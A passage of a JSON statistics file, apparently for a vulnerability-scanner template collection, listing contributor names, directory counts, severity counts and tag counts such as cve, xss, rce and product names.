eldawakhly","count":1},{"name":"pwnwithlove","count":1},{"name":"nobody","count":1},{"name":"elitebaz","count":1},{"name":"5up3r541y4n","count":1},{"name":"yuansec","count":1},{"name":"michal-mikolas","count":1},{"name":"ilovebinbash","count":1},{"name":"schniggie","count":1},{"name":"pjborah","count":1},{"name":"sanineng","count":1},{"name":"husain","count":1},{"name":"kresec","count":1},{"name":"ahmed abou-ela","count":1},{"name":"dorkerdevil","count":1},{"name":"berkdusunur","count":1},{"name":"zinminphy0","count":1},{"name":"push4d","count":1},{"name":"0xkayala","count":1},{"name":"miroslavsotak","count":1},{"name":"amnotacat","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"2rs3c","count":1},{"name":"tehtbl","count":1},{"name":"brianlam38","count":1},{"name":"barthy.koeln","count":1},{"name":"couskito","count":1},{"name":"dawid-czarnecki","count":1},{"name":"tim_koopmans","count":1},{"name":"yaser_s","count":1},{"name":"m0ck3d","count":1},{"name":"adrianmf","count":1},{"name":"eremit4","count":1},{"name":"j33n1k4","count":1},{"name":"pdp","count":1},{"name":"mhdsamx","count":1},{"name":"jeya.seelan","count":1},{"name":"kchason","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"liquidsec","count":1},{"name":"sicksec","count":1},{"name":"spac3wh1te","count":1},{"name":"fopina","count":1},{"name":"high","count":1},{"name":"anonymous","count":1},{"name":"daviey","count":1},{"name":"rubina119","count":1},{"name":"pussycat0","count":1},{"name":"shivampand3y","count":1},{"name":"naglis","count":1},{"name":"xcapri","count":1},{"name":"godfatherorwa","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"lixts","count":1},{"name":"professorabhay","count":1},{"name":"danfaizer","count":1},{"name":"chesterblue","count":1},{"name":"makyotox","count":1},{"name":"adamparsons","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"harryha","count":1},{"name":"borna nematzadeh","count":1},{"name":"0xcharan","count":1},{"name":"vulnspace","count":1},{"name":"ynnirc","count":1},{"name":"anon-artist","count":1},{"name":"dmartyn","count":1},{"name":"sec_hawk","count":1},{"name":"bjxsec","count":1},{"name":"unblvr1","count":1},{"name":"technicaljunkie","count":1},{"name":"numan türle","count":1},{"name":"am0nt31r0","count":1},{"name":"dhiyanesdk","count":1},{"name":"mbmy","count":1},{"name":"michael wedl","count":1},{"name":"yashgoti","count":1},{"name":"gonski","count":1},{"name":"prettyboyaaditya","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"iampritam","count":1},{"name":"calumjelrick","count":1},{"name":"0xprial","count":1},{"name":"cravaterouge","count":1},{"name":"b0yd","count":1},{"name":"marcio mendes","count":1},{"name":"gboddin","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"mayank_pandey01","count":1},{"name":"youngpope","count":1},{"name":"watchtowr","count":1},{"name":"co0nan","count":1},{"name":"0xh7ml","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"alexrydzak","count":1},{"name":"mrcl0wnlab","count":1},{"name":"shreyapohekar","count":1},{"name":"thelicato","count":1},{"name":"ptonewreckin","count":1},{"name":"jub0bs","count":1},{"name":"ohlinge","count":1},{"name":"notwhy","count":1},{"name":"ruppde","count":1},{"name":"h4sh5","count":1},{"name":"erikowen","count":1},{"name":"exceed","count":1},{"name":"adnanekhan","count":1},{"name":"zandros0","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"zsusac","count":1},{"name":"vinit989","count":1},{"name":"ledoubletake","count":1},{"name":"secthebit","count":1},{"name":"juliosmelo","count":1},{"name":"clment cruchet","count":1},{"name":"narluin","count":1},{"name":"ipanda","count":1},{"name":"omranisecurity","count":1},{"name":"mantissts","count":1},{"name":"yavolo","count":1},{"name":"rojanrijal","count":1},{"name":"ldionmarcil","count":1},{"name":"philippdelteil","count":1},{"name":"pry0cc","count":1},{"name":"joaonevess","count":1},{"name":"b0rn2r00t","count":1},{"name":"realexp3rt","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"pudsec","count":1},{"name":"httpvoid","count":1},{"name":"ok_bye_now","count":1},{"name":"ahmetpergamum","count":1},{"name":"manuelbua","count":1},{"name":"bughuntersurya","count":1},{"name":"justmumu","count":1},{"name":"knassar702","count":1},{"name":"xshuden","count":1},{"name":"th3.d1p4k","count":1},{"name":"metascan","count":1},{"name":"nerrorsec","count":1},{"name":"phyr3wall","count":1},{"name":"f0xy","count":1},{"name":"win3zz","count":1},{"name":"kabirsuda","count":1},{"name":"remonsec","count":1},{"name":"dale clarke","count":1},{"name":"rinolock","count":1},{"name":"udyz","count":1},{"name":"jbertman","count":1},{"name":"allenwest24","count":1},{"name":"affix","count":1},{"name":"pepitoh","count":1},{"name":"manasmbellani","count":1},{"name":"invisiblethreat","count":1},{"name":"omarkurt","count":1},{"name":"chron0x","count":1},{"name":"_darrenmartyn","count":1},{"name":"kareemse1im","count":1},{"name":"un-fmunozs","count":1},{"name":"mariam tariq","count":1},{"name":"jacalynli","count":1},{"name":"byobin","count":1},{"name":"jna1","count":1},{"name":"hakimkt","count":1},{"name":"ph33rr","count":1},{"name":"jiheon-dev","count":1},{"name":"nuts7","count":1},{"name":"shiva (strobes security)","count":1},{"name":"noobexploiter","count":1},{"name":"patrick pirker","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"th3r4id","count":1},{"name":"zn9988","count":1},{"name":"pascalheidmann","count":1},{"name":"lamscun","count":1},{"name":"ramkrishna sawant","count":1}],"directory":[{"name":"http","count":7477},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":135},{"name":"cloud","count":98},{"name":"code","count":81},{"name":"javascript","count":57},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":11},{"name":"cves.json","count":1},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1}],"severity":[{"name":"info","count":3683},{"name":"high","count":1728},{"name":"medium","count":1520},{"name":"critical","count":1035},{"name":"low","count":263},{"name":"unknown","count":39}],"types":[{"name":"file","count":337},{"name":"dns","count":25}]} +{"tags":[{"name":"cve","count":2510},{"name":"panel","count":1157},{"name":"wordpress","count":983},{"name":"exposure","count":948},{"name":"xss","count":911},{"name":"wp-plugin","count":852},{"name":"osint","count":804},{"name":"tech","count":686},{"name":"lfi","count":662},{"name":"misconfig","count":659},{"name":"edb","count":599},{"name":"rce","count":599},{"name":"packetstorm","count":544},{"name":"wpscan","count":502},{"name":"cve2021","count":491},{"name":"cve2022","count":479},{"name":"wp","count":426},{"name":"cve2023","count":380},{"name":"unauth","count":367},{"name":"sqli","count":364},{"name":"file","count":346},{"name":"authenticated","count":343},{"name":"intrusive","count":302},{"name":"detect","count":295},{"name":"login","count":284},{"name":"kev","count":275},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"oast","count":222},{"name":"config","count":221},{"name":"default-login","count":216},{"name":"top-200","count":215},{"name":"osint-social","count":210},{"name":"network","count":195},{"name":"token","count":193},{"name":"apache","count":191},{"name":"","count":191},{"name":"devops","count":177},{"name":"cve2018","count":170},{"name":"iot","count":167},{"name":"cve2019","count":164},{"name":"keys","count":156},{"name":"joomla","count":148},{"name":"install","count":147},{"name":"malware","count":142},{"name":"tcp","count":136},{"name":"redirect","count":135},{"name":"cloud","count":134},{"name":"aws","count":134},{"name":"auth-bypass","count":133},{"name":"ssrf","count":119},{"name":"phishing","count":117},{"name":"amazon","count":117},{"name":"cms","count":113},{"name":"files","count":113},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":90},{"name":"disclosure","count":89},{"name":"linux","count":85},{"name":"code","count":81},{"name":"cve2024","count":80},{"name":"local","count":80},{"name":"privesc","count":79},{"name":"seclists","count":79},{"name":"takeover","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":73},{"name":"oss","count":68},{"name":"cisco","count":67},{"name":"js","count":67},{"name":"enum","count":65},{"name":"adobe","count":63},{"name":"ir","count":61},{"name":"huntr","count":60},{"name":"atlassian","count":59},{"name":"cve2015","count":59},{"name":"cve2016","count":57},{"name":"vmware","count":56},{"name":"detection","count":56},{"name":"google","count":56},{"name":"c2","count":55},{"name":"tenable","count":48},{"name":"logs","count":48},{"name":"log4j","count":47},{"name":"vulhub","count":46},{"name":"hackerone","count":46},{"name":"osint-gaming","count":45},{"name":"aem","count":45},{"name":"cve2014","count":44},{"name":"jndi","count":44},{"name":"debug","count":44},{"name":"php","count":44},{"name":"generic","count":43},{"name":"deserialization","count":43},{"name":"oa","count":42},{"name":"traversal","count":42},{"name":"osint-hobby","count":42},{"name":"plugin","count":42},{"name":"microsoft","count":42},{"name":"osint-porn","count":42},{"name":"springboot","count":41},{"name":"cnvd","count":41},{"name":"misc","count":40},{"name":"injection","count":38},{"name":"miscellaneous","count":38},{"name":"jira","count":37},{"name":"listing","count":37},{"name":"kubernetes","count":37},{"name":"ibm","count":36},{"name":"cti","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"fuzz","count":34},{"name":"ssl","count":33},{"name":"tls","count":32},{"name":"osint-tech","count":31},{"name":"dlink","count":30},{"name":"wp-theme","count":30},{"name":"osint-coding","count":30},{"name":"ec2","count":30},{"name":"api","count":28},{"name":"k8s","count":28},{"name":"fortinet","count":28},{"name":"gitlab","count":28},{"name":"proxy","count":27},{"name":"dns","count":27},{"name":"citrix","count":27},{"name":"bestwebsoft","count":27},{"name":"cve2012","count":26},{"name":"zohocorp","count":26},{"name":"firewall","count":26},{"name":"ssh","count":26},{"name":"lfr","count":26},{"name":"weaver","count":25},{"name":"manageengine","count":25},{"name":"osint-finance","count":24},{"name":"osint-images","count":24},{"name":"zoho","count":24},{"name":"admin","count":24},{"name":"osint-business","count":24},{"name":"osint-shopping","count":24},{"name":"file-upload","count":23},{"name":"audit","count":23},{"name":"xxe","count":23},{"name":"tomcat","count":23},{"name":"stored-xss","count":23},{"name":"yonyou","count":23},{"name":"prestashop","count":22},{"name":"github","count":22},{"name":"s3","count":22},{"name":"cicd","count":22},{"name":"printer","count":21},{"name":"ecology","count":21},{"name":"dast","count":21},{"name":"msf","count":21},{"name":"weblogic","count":21},{"name":"ftp","count":20},{"name":"camera","count":20},{"name":"jenkins","count":20},{"name":"confluence","count":19},{"name":"wavlink","count":19},{"name":"grafana","count":19},{"name":"hp","count":19},{"name":"struts","count":19},{"name":"rukovoditel","count":19},{"name":"android","count":18},{"name":"ruijie","count":18},{"name":"node.js","count":18},{"name":"osint-music","count":18},{"name":"cve2011","count":18},{"name":"vpn","count":18},{"name":"coldfusion","count":18},{"name":"azure","count":17},{"name":"microweber","count":17},{"name":"mail","count":17},{"name":"honeypot","count":17},{"name":"headless","count":17},{"name":"nginx","count":17},{"name":"cve2009","count":16},{"name":"osint-blog","count":16},{"name":"status","count":16},{"name":"service","count":16},{"name":"backup","count":16},{"name":"jarm","count":16},{"name":"alibaba","count":16},{"name":"magento","count":16},{"name":"rconfig","count":16},{"name":"backdoor","count":16},{"name":"netgear","count":15},{"name":"moosocial","count":15},{"name":"zyxel","count":15},{"name":"dashboard","count":15},{"name":"seeyon","count":15},{"name":"nodejs","count":15},{"name":"tongda","count":15},{"name":"installer","count":15},{"name":"setup","count":15},{"name":"java","count":15},{"name":"cve2008","count":15},{"name":"nagios","count":15},{"name":"bypass","count":15},{"name":"woocommerce","count":15},{"name":"redhat","count":15},{"name":"cnvd2021","count":15},{"name":"ruby","count":15},{"name":"ssti","count":15},{"name":"cve2013","count":15},{"name":"dell","count":14},{"name":"osint-art","count":14},{"name":"docker","count":14},{"name":"osint-health","count":14},{"name":"smtp","count":14},{"name":"jboss","count":14},{"name":"redis","count":14},{"name":"creds-stuffing","count":14},{"name":"rds","count":14},{"name":"icewarp","count":14},{"name":"npm","count":14},{"name":"login-check","count":14},{"name":"auth","count":14},{"name":"node","count":14},{"name":"domainmod","count":14},{"name":"info-leak","count":14},{"name":"git","count":14},{"name":"ivanti","count":14},{"name":"fortigate","count":13},{"name":"hashicorp","count":13},{"name":"mysql","count":13},{"name":"postgresql","count":13},{"name":"graphql","count":13},{"name":"cuppacms","count":13},{"name":"abstractapi","count":13},{"name":"laravel","count":13},{"name":"airflow","count":13},{"name":"sonicwall","count":13},{"name":"windows","count":13},{"name":"cuppa","count":13},{"name":"rails","count":13},{"name":"fuzzing","count":13},{"name":"osint-dating","count":13},{"name":"osint-political","count":13},{"name":"webserver","count":12},{"name":"jetbrains","count":12},{"name":"vbulletin","count":12},{"name":"kafka","count":12},{"name":"zimbra","count":12},{"name":"newrelic","count":12},{"name":"smb","count":12},{"name":"phpgurukul","count":12},{"name":"doppler","count":12},{"name":"netsweeper","count":12},{"name":"ofbiz","count":12},{"name":"drupal","count":12},{"name":"cache","count":11},{"name":"prometheus","count":11},{"name":"iis","count":11},{"name":"iam","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"phpmyadmin","count":11},{"name":"jolokia","count":11},{"name":"xstream","count":11},{"name":"online-fire-reporting","count":11},{"name":"spring","count":11},{"name":"fastjson","count":11},{"name":"django","count":11},{"name":"hikvision","count":11},{"name":"osint-video","count":11},{"name":"glpi","count":11},{"name":"dedecms","count":11},{"name":"sitecore","count":10},{"name":"zabbix","count":10},{"name":"dahua","count":10},{"name":"crlf","count":10},{"name":"symfony","count":10},{"name":"solr","count":10},{"name":"thinkphp","count":10},{"name":"progress","count":10},{"name":"samsung","count":10},{"name":"solarview","count":10},{"name":"dropbox","count":10},{"name":"elasticsearch","count":10},{"name":"digitalocean","count":10},{"name":"db","count":10},{"name":"xstream_project","count":10},{"name":"elastic","count":9},{"name":"pfsense","count":9},{"name":"blind","count":9},{"name":"artica","count":9},{"name":"firebase","count":9},{"name":"gateway","count":9},{"name":"opencats","count":9},{"name":"python","count":9},{"name":"cnvd2020","count":9},{"name":"sophos","count":9},{"name":"druid","count":9},{"name":"scada","count":9},{"name":"sangfor","count":9},{"name":"wso2","count":9},{"name":"lucee","count":9},{"name":"vcenter","count":9},{"name":"gitea","count":9},{"name":"facebook","count":9},{"name":"cloudtrail","count":9},{"name":"f5","count":9},{"name":"joomla\\!","count":9},{"name":"console","count":9},{"name":"bitbucket","count":9},{"name":"versa","count":9},{"name":"moodle","count":9},{"name":"exchange","count":9},{"name":"secret","count":9},{"name":"kube","count":9},{"name":"nexus","count":8},{"name":"mirai","count":8},{"name":"emerge","count":8},{"name":"odoo","count":8},{"name":"atom","count":8},{"name":"symantec","count":8},{"name":"default-page","count":8},{"name":"spotweb_project","count":8},{"name":"instrusive","count":8},{"name":"cisco-switch","count":8},{"name":"hms","count":8},{"name":"microfocus","count":8},{"name":"go","count":8},{"name":"mlflow","count":8},{"name":"exploitdb","count":8},{"name":"error","count":8},{"name":"huawei","count":8},{"name":"metadata","count":8},{"name":"phpinfo","count":8},{"name":"e-office","count":8},{"name":"wanhu","count":8},{"name":"spotweb","count":8},{"name":"bucket","count":8},{"name":"unauthenticated","count":8},{"name":"cloud-enum","count":8},{"name":"ognl","count":8},{"name":"openemr","count":8},{"name":"nagiosxi","count":8},{"name":"phpjabbers","count":8},{"name":"lfprojects","count":8},{"name":"osint-news","count":8},{"name":"recon","count":8},{"name":"config-audit","count":8},{"name":"manager","count":8},{"name":"oauth","count":8},{"name":"discord","count":8},{"name":"car_rental_management_system_project","count":7},{"name":"websphere","count":7},{"name":"oos","count":7},{"name":"mobileiron","count":7},{"name":"slack","count":7},{"name":"nacos","count":7},{"name":"gogs","count":7},{"name":"teamcity","count":7},{"name":"telesquare","count":7},{"name":"squirrelmail","count":7},{"name":"nortekcontrol","count":7},{"name":"bigip","count":7},{"name":"keking","count":7},{"name":"cacti","count":7},{"name":"maps","count":7},{"name":"linkedin","count":7},{"name":"landray","count":7},{"name":"activemq","count":7},{"name":"vms","count":7},{"name":"pmb","count":7},{"name":"shopify","count":7},{"name":"bloofox","count":7},{"name":"opensis","count":7},{"name":"avtech","count":7},{"name":"database","count":7},{"name":"fpd","count":7},{"name":"moodating","count":7},{"name":"blockchain","count":7},{"name":"fortios","count":7},{"name":"ruckus","count":7},{"name":"monstra","count":7},{"name":"twitter","count":7},{"name":"vpc","count":7},{"name":"contec","count":7},{"name":"mongodb","count":7},{"name":"rfi","count":7},{"name":"solarwinds","count":7},{"name":"vrealize","count":7},{"name":"filemanager","count":7},{"name":"sonarqube","count":6},{"name":"microstrategy","count":6},{"name":"jeecg","count":6},{"name":"ldap","count":6},{"name":"splunk","count":6},{"name":"cockpit","count":6},{"name":"paloaltonetworks","count":6},{"name":"openvpn","count":6},{"name":"kubelet","count":6},{"name":"leak","count":6},{"name":"sql","count":6},{"name":"synacor","count":6},{"name":"paypal","count":6},{"name":"magmi","count":6},{"name":"asus","count":6},{"name":"gcp","count":6},{"name":"beyondtrust","count":6},{"name":"elfinder","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"plesk","count":6},{"name":"74cms","count":6},{"name":"keycloak","count":6},{"name":"jamf","count":6},{"name":"couchdb","count":6},{"name":"flutterwave","count":6},{"name":"server","count":6},{"name":"express","count":6},{"name":"webmin","count":6},{"name":"asp","count":6},{"name":"servicenow","count":6},{"name":"liferay","count":6},{"name":"chanjet","count":6},{"name":"minio","count":6},{"name":"bmc","count":6},{"name":"advantech","count":6},{"name":"zhiyuan","count":6},{"name":"typo3","count":6},{"name":"geoserver","count":6},{"name":"jetty","count":6},{"name":"tikiwiki","count":6},{"name":"cobbler","count":6},{"name":"rat","count":6},{"name":"doctor-appointment-system","count":6},{"name":"log","count":6},{"name":"digitaldruid","count":5},{"name":"10web","count":5},{"name":"cloudflare","count":5},{"name":"totolink","count":5},{"name":"open-emr","count":5},{"name":"openfire","count":5},{"name":"decision-center","count":5},{"name":"adminer","count":5},{"name":"circarlife","count":5},{"name":"tenda","count":5},{"name":"ems","count":5},{"name":"telerik","count":5},{"name":"froxlor","count":5},{"name":"react","count":5},{"name":"graylog","count":5},{"name":"pyload","count":5},{"name":"wbce","count":5},{"name":"axigen","count":5},{"name":"cdata","count":5},{"name":"storage","count":5},{"name":"gocd","count":5},{"name":"awstats","count":5},{"name":"hpe","count":5},{"name":"mssql","count":5},{"name":"jwt","count":5},{"name":"carrental","count":5},{"name":"acm","count":5},{"name":"papercut","count":5},{"name":"agentejo","count":5},{"name":"jabber","count":5},{"name":"qnap","count":5},{"name":"asana","count":5},{"name":"sentry","count":5},{"name":"xmlrpc","count":5},{"name":"webkul","count":5},{"name":"percha","count":5},{"name":"rseenet","count":5},{"name":"hybris","count":5},{"name":"qdpm","count":5},{"name":"thedigitalcraft","count":5},{"name":"magmi_project","count":5},{"name":"metinfo","count":5},{"name":"gnu","count":5},{"name":"firmware","count":5},{"name":"vehicle_service_management_system_project","count":5},{"name":"fatpipe","count":5},{"name":"nuuo","count":5},{"name":"web3","count":5},{"name":"voip","count":5},{"name":"sysaid","count":5},{"name":"adb","count":5},{"name":"cnvd2023","count":5},{"name":"chamilo","count":5},{"name":"parallels","count":5},{"name":"caucho","count":5},{"name":"mikrotik","count":5},{"name":"sftp","count":5},{"name":"genetechsolutions","count":5},{"name":"strapi","count":5},{"name":"apisix","count":5},{"name":"connectwise","count":5},{"name":"tibco","count":5},{"name":"matrix","count":5},{"name":"redmine","count":5},{"name":"openai","count":5},{"name":"schneider-electric","count":5},{"name":"avaya","count":5},{"name":"crushftp","count":5},{"name":"terramaster","count":5},{"name":"zzzcms","count":5},{"name":"akamai","count":5},{"name":"ethereum","count":5},{"name":"openstack","count":5},{"name":"spark","count":5},{"name":"resin","count":5},{"name":"cve2007","count":5},{"name":"wpdevart","count":5},{"name":"dionaea","count":5},{"name":"glpi-project","count":5},{"name":"kkfileview","count":5},{"name":"webview","count":5},{"name":"jupyter","count":5},{"name":"elementor","count":5},{"name":"checkpoint","count":5},{"name":"avideo","count":5},{"name":"craftcms","count":5},{"name":"square","count":5},{"name":"circontrol","count":5},{"name":"goanywhere","count":5},{"name":"hoteldruid","count":5},{"name":"swagger","count":5},{"name":"auieo","count":4},{"name":"webmail","count":4},{"name":"dolibarr","count":4},{"name":"linkerd","count":4},{"name":"aura","count":4},{"name":"ampache","count":4},{"name":"shiro","count":4},{"name":"nextjs","count":4},{"name":"kentico","count":4},{"name":"consul","count":4},{"name":"candidats","count":4},{"name":"jsf","count":4},{"name":"powerjob","count":4},{"name":"joomlamo","count":4},{"name":"search","count":4},{"name":"bitrix","count":4},{"name":"churchcrm","count":4},{"name":"newstatpress_project","count":4},{"name":"fit2cloud","count":4},{"name":"newstatpress","count":4},{"name":"metasploit","count":4},{"name":"ray","count":4},{"name":"imgproxy","count":4},{"name":"stripe","count":4},{"name":"springcloud","count":4},{"name":"supsystic","count":4},{"name":"ternaria","count":4},{"name":"myeventon","count":4},{"name":"horde","count":4},{"name":"esri","count":4},{"name":"opencms","count":4},{"name":"okta","count":4},{"name":"wcs","count":4},{"name":"concrete","count":4},{"name":"env","count":4},{"name":"intelbras","count":4},{"name":"dahuasecurity","count":4},{"name":"pega","count":4},{"name":"aspose","count":4},{"name":"kevinlab","count":4},{"name":"password","count":4},{"name":"datadog","count":4},{"name":"confluent","count":4},{"name":"mostra","count":4},{"name":"metabase","count":4},{"name":"mantisbt","count":4},{"name":"d-link","count":4},{"name":"artifactory","count":4},{"name":"sendgrid","count":4},{"name":"djangoproject","count":4},{"name":"proftpd","count":4},{"name":"prtg","count":4},{"name":"pie-register","count":4},{"name":"finicity","count":4},{"name":"mailchimp","count":4},{"name":"mautic","count":4},{"name":"zend","count":4},{"name":"aria","count":4},{"name":"phpjabber","count":4},{"name":"postmessage","count":4},{"name":"globalprotect","count":4},{"name":"ebs","count":4},{"name":"linuxfoundation","count":4},{"name":"arcgis","count":4},{"name":"codeigniter","count":4},{"name":"bittrex","count":4},{"name":"info","count":4},{"name":"harbor","count":4},{"name":"cve2005","count":4},{"name":"webshell","count":4},{"name":"panabit","count":4},{"name":"heroku","count":4},{"name":"salesforce","count":4},{"name":"seagate","count":4},{"name":"osgeo","count":4},{"name":"jfrog","count":4},{"name":"nosqli","count":4},{"name":"httpd","count":4},{"name":"eclipse","count":4},{"name":"kyocera","count":4},{"name":"rubyonrails","count":4},{"name":"moveit","count":4},{"name":"rocketchat","count":4},{"name":"sigb","count":4},{"name":"tiki","count":4},{"name":"figma","count":4},{"name":"jorani","count":4},{"name":"ghost","count":4},{"name":"cnvd2019","count":4},{"name":"roxy","count":4},{"name":"umbraco","count":4},{"name":"easypost","count":4},{"name":"wp-statistics","count":4},{"name":"hongfan","count":4},{"name":"flickr","count":4},{"name":"pip","count":4},{"name":"thimpress","count":4},{"name":"httpserver","count":4},{"name":"angular","count":4},{"name":"kibana","count":4},{"name":"h3c","count":4},{"name":"learnpress","count":4},{"name":"panos","count":4},{"name":"dotnet","count":4},{"name":"osint-archived","count":4},{"name":"bamboo","count":4},{"name":"articatech","count":4},{"name":"puppet","count":4},{"name":"yeswiki","count":4},{"name":"pixie","count":4},{"name":"centos","count":4},{"name":"dom","count":4},{"name":"audiocodes","count":4},{"name":"wireguard","count":4},{"name":"veronalabs","count":4},{"name":"casaos","count":4},{"name":"harmistechnology","count":4},{"name":"sugarcrm","count":4},{"name":"phppgadmin","count":4},{"name":"mitel","count":4},{"name":"age-encryption","count":4},{"name":"mooveagency","count":4},{"name":"flatpress","count":4},{"name":"metersphere","count":4},{"name":"pluginus","count":4},{"name":"hongdian","count":4},{"name":"thinkcmf","count":4},{"name":"hospital_management_system_project","count":4},{"name":"kingsoft","count":4},{"name":"juniper","count":4},{"name":"http","count":4},{"name":"terra-master","count":4},{"name":"sound4","count":4},{"name":"owncloud","count":4},{"name":"pmb_project","count":4},{"name":"telegram","count":4},{"name":"grav","count":4},{"name":"gnuboard","count":4},{"name":"igniterealtime","count":4},{"name":"jellyfin","count":4},{"name":"cnvd2022","count":4},{"name":"reprisesoftware","count":4},{"name":"creativeitem","count":4},{"name":"zte","count":4},{"name":"pentaho","count":4},{"name":"flink","count":4},{"name":"linksys","count":4},{"name":"mostracms","count":4},{"name":"os4ed","count":4},{"name":"purchase_order_management_system_project","count":4},{"name":"royalevent","count":4},{"name":"photo","count":4},{"name":"rabbitmq","count":4},{"name":"mcafee","count":4},{"name":"ueditor","count":3},{"name":"payara","count":3},{"name":"httpbin","count":3},{"name":"cybelesoft","count":3},{"name":"voipmonitor","count":3},{"name":"grp","count":3},{"name":"mailgun","count":3},{"name":"self-hosted","count":3},{"name":"particle","count":3},{"name":"dvr","count":3},{"name":"tautulli","count":3},{"name":"key","count":3},{"name":"webcam","count":3},{"name":"webadmin","count":3},{"name":"selenium","count":3},{"name":"posh","count":3},{"name":"pandorafms","count":3},{"name":"graph","count":3},{"name":"backdropcms","count":3},{"name":"javascript","count":3},{"name":"sidekiq","count":3},{"name":"nuxtjs","count":3},{"name":"adafruit","count":3},{"name":"superadmin","count":3},{"name":"passive","count":3},{"name":"nc","count":3},{"name":"nortek","count":3},{"name":"limesurvey","count":3},{"name":"xerox","count":3},{"name":"xoops","count":3},{"name":"monitor","count":3},{"name":"rstudio","count":3},{"name":"droneci","count":3},{"name":"emqx","count":3},{"name":"petya","count":3},{"name":"netflix","count":3},{"name":"e-cology","count":3},{"name":"ampps","count":3},{"name":"wpdeveloper","count":3},{"name":"r-seenet","count":3},{"name":"superset","count":3},{"name":"softwarepublico","count":3},{"name":"getsimple","count":3},{"name":"axis","count":3},{"name":"qlik","count":3},{"name":"avada","count":3},{"name":"yii","count":3},{"name":"buffalo","count":3},{"name":"ansible","count":3},{"name":"wordfence","count":3},{"name":"complete_online_job_search_system_project","count":3},{"name":"samba","count":3},{"name":"sharepoint","count":3},{"name":"purchase-order-management-system","count":3},{"name":"idrac","count":3},{"name":"tableau","count":3},{"name":"cluster","count":3},{"name":"geowebserver","count":3},{"name":"bash","count":3},{"name":"synology","count":3},{"name":"flutter","count":3},{"name":"rackn","count":3},{"name":"fanwei","count":3},{"name":"poms","count":3},{"name":"nuget","count":3},{"name":"ad","count":3},{"name":"gibbon","count":3},{"name":"evlink","count":3},{"name":"cas","count":3},{"name":"strangerstudios","count":3},{"name":"switch","count":3},{"name":"mongo","count":3},{"name":"3cx","count":3},{"name":"piwigo","count":3},{"name":"gvectors","count":3},{"name":"sudo","count":3},{"name":"loytec","count":3},{"name":"academylms","count":3},{"name":"esafenet","count":3},{"name":"influxdb","count":3},{"name":"sqlite","count":3},{"name":"ixcache","count":3},{"name":"subrion","count":3},{"name":"ruckuswireless","count":3},{"name":"rpm","count":3},{"name":"cpanel","count":3},{"name":"rlm","count":3},{"name":"unifi","count":3},{"name":"purchase-order","count":3},{"name":"messaging","count":3},{"name":"western_digital","count":3},{"name":"gradle","count":3},{"name":"smuggling","count":3},{"name":"woodwing","count":3},{"name":"credential","count":3},{"name":"covenant","count":3},{"name":"pulsar","count":3},{"name":"webalizer","count":3},{"name":"zeit","count":3},{"name":"securepoint","count":3},{"name":"circleci","count":3},{"name":"selea","count":3},{"name":"octobercms","count":3},{"name":"backdrop","count":3},{"name":"modoboa","count":3},{"name":"openam","count":3},{"name":"netlify","count":3},{"name":"magnolia","count":3},{"name":"instagram","count":3},{"name":"octoprint","count":3},{"name":"monitorr","count":3},{"name":"cloudwatch","count":3},{"name":"carel","count":3},{"name":"zeroshell","count":3},{"name":"dreambox","count":3},{"name":"modem","count":3},{"name":"hsphere","count":3},{"name":"apple","count":3},{"name":"webkul-qloapps","count":3},{"name":"jeesns","count":3},{"name":"diagrams","count":3},{"name":"shell","count":3},{"name":"etsy","count":3},{"name":"webtareas","count":3},{"name":"fuelcms","count":3},{"name":"saltstack","count":3},{"name":"electron","count":3},{"name":"ninjaforms","count":3},{"name":"telnet","count":3},{"name":"segment","count":3},{"name":"zendesk","count":3},{"name":"discourse","count":3},{"name":"weiphp","count":3},{"name":"structurizr","count":3},{"name":"csrf","count":3},{"name":"teampass","count":3},{"name":"glassfish","count":3},{"name":"trendnet","count":3},{"name":"thinfinity","count":3},{"name":"listserv","count":3},{"name":"ithemes","count":3},{"name":"soplanning","count":3},{"name":"watchguard","count":3},{"name":"chatgpt","count":3},{"name":"trixbox","count":3},{"name":"contentful","count":3},{"name":"temenos","count":3},{"name":"flexvnf","count":3},{"name":"etcd","count":3},{"name":"pypi","count":3},{"name":"std42","count":3},{"name":"afterlogic","count":3},{"name":"fanruan","count":3},{"name":"learndash","count":3},{"name":"netdata","count":3},{"name":"clusterengine","count":3},{"name":"i3geo","count":3},{"name":"wwbn","count":3},{"name":"labkey","count":3},{"name":"openwrt","count":3},{"name":"waf","count":3},{"name":"e-mobile","count":3},{"name":"forgerock","count":3},{"name":"lansweeper","count":3},{"name":"default","count":3},{"name":"yzmcms","count":3},{"name":"thefactory","count":3},{"name":"dokuwiki","count":3},{"name":"eyoucms","count":3},{"name":"movable","count":3},{"name":"nifi","count":3},{"name":"lighttpd","count":3},{"name":"revive-adserver","count":3},{"name":"opencart","count":3},{"name":"webtareas_project","count":3},{"name":"openbmcs","count":3},{"name":"webnus","count":3},{"name":"siemens","count":3},{"name":"fileman","count":3},{"name":"decision-server","count":3},{"name":"xwiki","count":3},{"name":"actuator","count":3},{"name":"drawio","count":3},{"name":"copyparty","count":3},{"name":"rancher","count":3},{"name":"dos","count":3},{"name":"bitrix24","count":3},{"name":"vercel","count":3},{"name":"h2o","count":3},{"name":"spip","count":3},{"name":"phpipam","count":3},{"name":"digital-watchdog","count":3},{"name":"truenas","count":3},{"name":"epson","count":3},{"name":"empirecms","count":3},{"name":"newsletter","count":3},{"name":"imap","count":3},{"name":"finecms","count":3},{"name":"redash","count":3},{"name":"lotus","count":3},{"name":"spotify","count":3},{"name":"sonatype","count":3},{"name":"joomlacomponent.inetla